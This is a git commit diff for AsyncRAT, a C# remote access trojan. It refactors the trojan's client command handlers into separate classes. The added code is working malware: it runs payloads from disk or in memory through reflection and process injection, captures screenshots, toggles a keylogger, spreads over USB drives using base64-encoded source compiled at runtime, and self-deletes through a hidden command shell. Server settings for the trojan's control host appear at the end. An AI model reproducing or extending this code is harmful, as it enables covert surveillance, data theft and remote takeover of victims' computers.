private object EndSendSync { get; } = new object();
public int BytesRecevied { get; set; }
public long BytesRecevied { get; set; }
public Clients(Socket socket)
{
@ -69,11 +69,11 @@ namespace AsyncRAT_Sharp.Sockets
{
try
{
ThreadPool.QueueUserWorkItem(HandlePacket.Read, new object[] { Settings.AES.Decrypt(ClientMS.ToArray()), this });
ThreadPool.QueueUserWorkItem(Packet.Read, new object[] { Settings.AES.Decrypt(ClientMS.ToArray()), this });
}
catch (CryptographicException)
{
HandleLogs.Addmsg($"Client {ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} tried to connect with wrong password, IP blocked", Color.Red);
new HandleLogs().Addmsg($"Client {ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} tried to connect with wrong password, IP blocked", Color.Red);
Settings.Blocked.Add(ClientSocket.RemoteEndPoint.ToString().Split(':')[0]);
Disconnected();
return;

4
AsyncRAT-C#/AsyncRAT-Sharp/Socket/Listener.cs
View File

@ -26,7 +26,7 @@ namespace AsyncRAT_Sharp.Sockets
};
Server.Bind(ipEndPoint);
Server.Listen(30);
HandleLogs.Addmsg($"Listenning {port}", Color.Green);
new HandleLogs().Addmsg($"Listenning {port}", Color.Green);
Server.BeginAccept(EndAccept, null);
}
catch (Exception ex)
@ -76,7 +76,7 @@ namespace AsyncRAT_Sharp.Sockets
if (count > 4)
{
Settings.Blocked.Add(socket.RemoteEndPoint.ToString().Split(':')[0]);
HandleLogs.Addmsg($"Client {socket.RemoteEndPoint.ToString().Split(':')[0]} tried to spam, IP blocked", Color.Red);
new HandleLogs().Addmsg($"Client {socket.RemoteEndPoint.ToString().Split(':')[0]} tried to spam, IP blocked", Color.Red);
foreach (Clients client in Settings.Online.ToList())
{
if (client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0] == socket.RemoteEndPoint.ToString().Split(':')[0] && client.LV != null)

16
AsyncRAT-C#/Client/Client.csproj
View File

@ -73,14 +73,16 @@
</ItemGroup>
<ItemGroup>
<Compile Include="Cryptography\Aes256.cs" />
<Compile Include="Handle Packet\BotKiller.cs" />
<Compile Include="Handle Packet\HandleBotKiller.cs" />
<Compile Include="Handle Packet\FileManager.cs" />
<Compile Include="Handle Packet\HandlePacket.cs" />
<Compile Include="Handle Packet\LimeLogger.cs" />
<Compile Include="Handle Packet\ProcessManager.cs" />
<Compile Include="Handle Packet\RemoteDesktop.cs" />
<Compile Include="Handle Packet\SendToMemory.cs" />
<Compile Include="Handle Packet\LimeUSB.cs" />
<Compile Include="Handle Packet\HandleGetScreenShot.cs" />
<Compile Include="Handle Packet\HandleUninstall.cs" />
<Compile Include="Handle Packet\Packet.cs" />
<Compile Include="Handle Packet\HandleLimeLogger.cs" />
<Compile Include="Handle Packet\HandleProcessManager.cs" />
<Compile Include="Handle Packet\HandleRemoteDesktop.cs" />
<Compile Include="Handle Packet\HandleSendTo.cs" />
<Compile Include="Handle Packet\HandleLimeUSB.cs" />
<Compile Include="Helper\Anti_Analysis.cs" />
<Compile Include="Helper\Methods.cs" />
<Compile Include="Install\HiddenStartup.cs" />

2
AsyncRAT-C#/Client/Handle Packet/FileManager.cs
View File

@ -11,7 +11,7 @@ using System.Diagnostics;
using System.Net.Sockets;
namespace Client.Handle_Packet
{
class FileManager
public class FileManager
{
public void GetDrivers()
{

4
AsyncRAT-C#/Client/Handle Packet/BotKiller.cs → AsyncRAT-C#/Client/Handle Packet/HandleBotKiller.cs
View File

@ -14,7 +14,7 @@ using Client.Sockets;
namespace Client.Handle_Packet
{
class BotKiller
public class HandleBotKiller
{
int count = 0;
public void RunBotKiller()
@ -57,7 +57,7 @@ namespace Client.Handle_Packet
return false;
}
private static bool IsWindowVisible(string lHandle)
private bool IsWindowVisible(string lHandle)
{
return IsWindowVisible(lHandle);
}

33
AsyncRAT-C#/Client/Handle Packet/HandleGetScreenShot.cs Normal file
View File

@ -0,0 +1,33 @@
using Client.MessagePack;
using Client.Sockets;
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
using System.Linq;
using System.Text;
using System.Windows.Forms;
namespace Client.Handle_Packet
{
public class HandleGetScreenShot
{
public HandleGetScreenShot()
{
Bitmap bmp = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);
using (Graphics g = Graphics.FromImage(bmp))
using (MemoryStream memoryStream = new MemoryStream())
{
g.CopyFromScreen(0, 0, 0, 0, Screen.PrimaryScreen.Bounds.Size);
Image thumb = bmp.GetThumbnailImage(256, 256, () => false, IntPtr.Zero);
thumb.Save(memoryStream, ImageFormat.Jpeg);
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "thumbnails";
msgpack.ForcePathObject("Image").SetAsBytes(memoryStream.ToArray());
ClientSocket.BeginSend(msgpack.Encode2Bytes());
}
bmp.Dispose();
}
}
}

2
AsyncRAT-C#/Client/Handle Packet/LimeLogger.cs → AsyncRAT-C#/Client/Handle Packet/HandleLimeLogger.cs
View File

@ -14,7 +14,7 @@ namespace Client.Handle_Packet
// This program is distributed for educational purposes only.
class LimeLogger
public static class HandleLimeLogger
{
public static bool isON = false;
public static void Run()

5
AsyncRAT-C#/Client/Handle Packet/LimeUSB.cs → AsyncRAT-C#/Client/Handle Packet/HandleLimeUSB.cs
View File

@ -10,7 +10,6 @@ using Microsoft.CSharp;
using System.CodeDom.Compiler;
using Client.MessagePack;
using Client.Sockets;
using System.Threading;
using System.Windows.Forms;
//
// │ Author : NYAN CAT
@ -22,7 +21,7 @@ using System.Windows.Forms;
namespace Client.Handle_Packet
{
class LimeUSB
public class HandleLimeUSB
{
public void Run()
{
@ -163,10 +162,10 @@ namespace Client.Handle_Packet
try
{
string source = Encoding.UTF8.GetString(Convert.FromBase64String("dXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7CnVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpbYXNzZW1ibHk6IEFzc2VtYmx5VHJhZGVtYXJrKCIlTGltZSUiKV0KW2Fzc2VtYmx5OiBHdWlkKCIlR3VpZCUiKV0KCnN0YXRpYyBjbGFzcyBMaW1lVVNCTW9kdWxlCnsKICAgIHB1YmxpYyBzdGF0aWMgdm9pZCBNYWluKCkKICAgIHsKICAgICAgICB0cnkKICAgICAgICB7CiAgICAgICAgICAgIFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLlN0YXJ0KEAiJUZpbGUlIik7CiAgICAgICAgICAgIFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLlN0YXJ0KEAiJVBheWxvYWQlIik7CiAgICAgICAgfQogICAgICAgIGNhdGNoIHsgfQogICAgfQp9"));
source = source.Replace("LimeUSBModule", Randomz(new Random().Next(6, 12)));
source = source.Replace("%Payload%", Path.GetPathRoot(infectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile);
source = source.Replace("%File%", infectedFile.Insert(3, spreadSettings.WorkDirectory + "\\"));
source = source.Replace("%Lime%", spreadSettings.InfectedTrademark);
source = source.Replace("%LimeUSBModule%", Randomz(new Random().Next(6, 12)));
source = source.Replace("%Guid%", Guid.NewGuid().ToString());
CompilerParameters cParams = new CompilerParameters();

6
AsyncRAT-C#/Client/Handle Packet/ProcessManager.cs → AsyncRAT-C#/Client/Handle Packet/HandleProcessManager.cs
View File

@ -11,9 +11,9 @@ using System.Text;
namespace Client.Handle_Packet
{
class ProcessManager
public class HandleProcessManager
{
public static void ProcessKill(int ID)
public void ProcessKill(int ID)
{
foreach (var process in Process.GetProcesses())
{
@ -29,7 +29,7 @@ namespace Client.Handle_Packet
ProcessList();
}
public static void ProcessList()
public void ProcessList()
{
StringBuilder sb = new StringBuilder();
var query = "SELECT ProcessId, Name, ExecutablePath FROM Win32_Process";

2
AsyncRAT-C#/Client/Handle Packet/RemoteDesktop.cs → AsyncRAT-C#/Client/Handle Packet/HandleRemoteDesktop.cs
View File

@ -13,7 +13,7 @@ using System;
namespace Client.Handle_Packet
{
class RemoteDesktop
public class HandleRemoteDesktop
{
public void CaptureAndSend()
{

56
AsyncRAT-C#/Client/Handle Packet/HandleSendTo.cs Normal file
View File

@ -0,0 +1,56 @@
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Threading;
using Client.MessagePack;
namespace Client.Handle_Packet
{
public class HandleSendTo
{
public void SendToDisk(MsgPack unpack_msgpack)
{
string fullPath = Path.GetTempFileName() + unpack_msgpack.ForcePathObject("Extension").AsString;
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(fullPath);
Process.Start(fullPath);
if (unpack_msgpack.ForcePathObject("Update").AsString == "true")
{
new HandleUninstall();
}
}
public void SendToMemory(MsgPack unpack_msgpack)
{
byte[] buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
string injection = unpack_msgpack.ForcePathObject("Inject").AsString;
byte[] plugin = unpack_msgpack.ForcePathObject("Plugin").GetAsBytes();
if (injection.Length == 0)
{
new Thread(delegate ()
{
Assembly loader = Assembly.Load(buffer);
object[] parm = null;
if (loader.EntryPoint.GetParameters().Length > 0)
{
parm = new object[] { new string[] { null } };
}
loader.EntryPoint.Invoke(null, parm);
})
{ IsBackground = true }.Start();
}
else
{
new Thread(delegate ()
{
Assembly loader = Assembly.Load(plugin);
MethodInfo meth = loader.GetType("Plugin.Program").GetMethod("Run");
meth.Invoke(null, new object[] { buffer, Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), injection) });
})
{ IsBackground = true }.Start();
}
}
}
}

44
AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs Normal file
View File

@ -0,0 +1,44 @@
using Client.Helper;
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;
namespace Client.Handle_Packet
{
public class HandleUninstall
{
public HandleUninstall()
{
if (Convert.ToBoolean(Settings.Install))
{
try
{
Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").DeleteValue(Path.GetFileName(Settings.ClientFullPath));
}
catch { }
}
ProcessStartInfo Del = null;
try
{
Del = new ProcessStartInfo()
{
Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Process.GetCurrentProcess().MainModule.FileName + "\"",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
FileName = "cmd.exe"
};
}
catch { }
finally
{
Methods.CloseMutex();
Process.Start(Del);
Environment.Exit(0);
}
}
}
}

140
AsyncRAT-C#/Client/Handle Packet/HandlePacket.cs → AsyncRAT-C#/Client/Handle Packet/Packet.cs
View File

@ -1,11 +1,7 @@
using Client.Helper;
using Client.MessagePack;
using Client.MessagePack;
using Client.Sockets;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
using System.Net.Sockets;
using System.Threading;
@ -13,7 +9,7 @@ using System.Windows.Forms;
namespace Client.Handle_Packet
{
class HandlePacket
public static class Packet
{
public static void Read(object data)
{
@ -38,40 +34,21 @@ namespace Client.Handle_Packet
case "thumbnails":
{
GetScreenShot();
new HandleGetScreenShot();
}
break;
case "sendFile":
{
Received();
string fullPath = Path.GetTempFileName() + unpack_msgpack.ForcePathObject("Extension").AsString;
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(fullPath);
Process.Start(fullPath);
if (unpack_msgpack.ForcePathObject("Update").AsString == "true")
{
Uninstall();
}
new HandleSendTo().SendToDisk(unpack_msgpack);
}
break;
case "sendMemory":
{
Received();
byte[] buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
string injection = unpack_msgpack.ForcePathObject("Inject").AsString;
byte[] plugin = unpack_msgpack.ForcePathObject("Plugin").GetAsBytes();
object[] parameters = new object[] { buffer, injection, plugin };
Thread thread = null;
if (injection.Length == 0)
{
thread = new Thread(new ParameterizedThreadStart(SendToMemory.Reflection));
}
else
{
thread = new Thread(new ParameterizedThreadStart(SendToMemory.RunPE));
}
thread.Start(parameters);
new HandleSendTo().SendToMemory(unpack_msgpack);
}
break;
@ -102,30 +79,30 @@ namespace Client.Handle_Packet
case "uninstall":
{
Uninstall();
new HandleUninstall();
}
break;
case "usbSpread":
{
LimeUSB limeUSB = new LimeUSB();
HandleLimeUSB limeUSB = new HandleLimeUSB();
limeUSB.Run();
}
break;
}
case "remoteDesktop":
{
switch (unpack_msgpack.ForcePathObject("Option").AsString)
{
case "true":
{
RemoteDesktop remoteDesktop = new RemoteDesktop();
// switch (unpack_msgpack.ForcePathObject("Option").AsString)
//{
//case "true":
// {
HandleRemoteDesktop remoteDesktop = new HandleRemoteDesktop();
remoteDesktop.CaptureAndSend();
}
break;
// }
}
}
break;
// break;
// }
case "processManager":
{
@ -133,17 +110,17 @@ namespace Client.Handle_Packet
{
case "List":
{
ProcessManager.ProcessList();
}
new HandleProcessManager().ProcessList();
break;
}
case "Kill":
{
ProcessManager.ProcessKill(Convert.ToInt32(unpack_msgpack.ForcePathObject("ID").AsString));
}
new HandleProcessManager().ProcessKill(Convert.ToInt32(unpack_msgpack.ForcePathObject("ID").AsString));
break;
}
}
}
break;
case "fileManager":
@ -154,39 +131,37 @@ namespace Client.Handle_Packet
{
FileManager fileManager = new FileManager();
fileManager.GetDrivers();
}
break;
}
case "getPath":
{
FileManager fileManager = new FileManager();
fileManager.GetPath(unpack_msgpack.ForcePathObject("Path").AsString);
}
break;
}
case "uploadFile":
{
string fullPath = unpack_msgpack.ForcePathObject("Name").AsString;
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(fullPath);
}
break;
}
case "deleteFile":
{
string fullPath = unpack_msgpack.ForcePathObject("File").AsString;
File.Delete(fullPath);
}
break;
}
case "execute":
{
string fullPath = unpack_msgpack.ForcePathObject("File").AsString;
Process.Start(fullPath);
}
break;
}
}
}
break;
@ -196,16 +171,15 @@ namespace Client.Handle_Packet
string file = unpack_msgpack.ForcePathObject("File").AsString;
string dwid = unpack_msgpack.ForcePathObject("DWID").AsString;
fileManager.DownnloadFile(file, dwid);
}
break;
}
case "botKiller":
{
BotKiller botKiller = new BotKiller();
HandleBotKiller botKiller = new HandleBotKiller();
botKiller.RunBotKiller();
}
break;
}
case "keyLogger":
{
@ -215,16 +189,16 @@ namespace Client.Handle_Packet
{
new Thread(() =>
{
LimeLogger.isON = true;
LimeLogger.Run();
HandleLimeLogger.isON = true;
HandleLimeLogger.Run();
}).Start();
}
else
{
LimeLogger.isON = false;
}
HandleLimeLogger.isON = false;
}
break;
}
case "visitURL":
{
@ -233,10 +207,10 @@ namespace Client.Handle_Packet
{
Process.Start(url);
}
}
break;
}
}
}
catch { }
}
@ -247,53 +221,5 @@ namespace Client.Handle_Packet
ClientSocket.BeginSend(msgpack.Encode2Bytes());
}
private static void Uninstall()
{
if (Convert.ToBoolean(Settings.Install))
{
try
{
Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").DeleteValue(Path.GetFileName(Settings.ClientFullPath));
}
catch { }
}
ProcessStartInfo Del = null;
try
{
Del = new ProcessStartInfo()
{
Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Process.GetCurrentProcess().MainModule.FileName + "\"",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
FileName = "cmd.exe"
};
}
catch { }
finally
{
Methods.CloseMutex();
Process.Start(Del);
Environment.Exit(0);
}
}
private static void GetScreenShot()
{
Bitmap bmp = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);
using (Graphics g = Graphics.FromImage(bmp))
using (MemoryStream memoryStream = new MemoryStream())
{
g.CopyFromScreen(0, 0, 0, 0, Screen.PrimaryScreen.Bounds.Size);
Image thumb = bmp.GetThumbnailImage(256, 256, () => false, IntPtr.Zero);
thumb.Save(memoryStream, ImageFormat.Jpeg);
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "thumbnails";
msgpack.ForcePathObject("Image").SetAsBytes(memoryStream.ToArray());
ClientSocket.BeginSend(msgpack.Encode2Bytes());
}
bmp.Dispose();
}
}
}

37
AsyncRAT-C#/Client/Handle Packet/SendToMemory.cs
View File

@ -1,37 +0,0 @@
using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
namespace Client.Handle_Packet
{
class SendToMemory
{
public static void Reflection(object obj)
{
object[] parameters = (object[])obj;
byte[] buffer = (byte[])parameters[0];
Assembly loader = Assembly.Load(buffer);
object[] parm = null;
if (loader.EntryPoint.GetParameters().Length > 0)
{
parm = new object[] { new string[] { null } };
}
loader.EntryPoint.Invoke(null, parm);
}
public static void RunPE(object obj)
{
try
{
object[] parameters = (object[])obj;
byte[] file = (byte[])parameters[0];
string injection = Convert.ToString(parameters[1]);
byte[] plugin = (byte[])parameters[2];
Assembly loader = Assembly.Load(plugin);
loader.GetType("Plugin.Program").GetMethod("Run").Invoke(null, new object[] { file, Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), injection) });
}
catch { }
}
}
}

2
AsyncRAT-C#/Client/Settings.cs
View File

@ -8,7 +8,7 @@ namespace Client
{
public static readonly string Ports = "6606";
public static readonly string Host = "127.0.0.1";
public static readonly string Version = "AsyncRAT 0.4.2";
public static readonly string Version = "AsyncRAT 0.4.3";
public static readonly string Install = "false";
public static readonly string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe");
public static string Password = "NYAN CAT";

2
AsyncRAT-C#/Client/Sockets/ClientSocket.cs
View File

@ -120,7 +120,7 @@ namespace Client.Sockets
MS.Write(Buffer, 0, recevied);
if (MS.Length == Buffersize)
{
ThreadPool.QueueUserWorkItem(HandlePacket.Read, Settings.aes256.Decrypt(MS.ToArray()));
ThreadPool.QueueUserWorkItem(Packet.Read, Settings.aes256.Decrypt(MS.ToArray()));
Buffer = new byte[4];
MS.Dispose();
MS = new MemoryStream();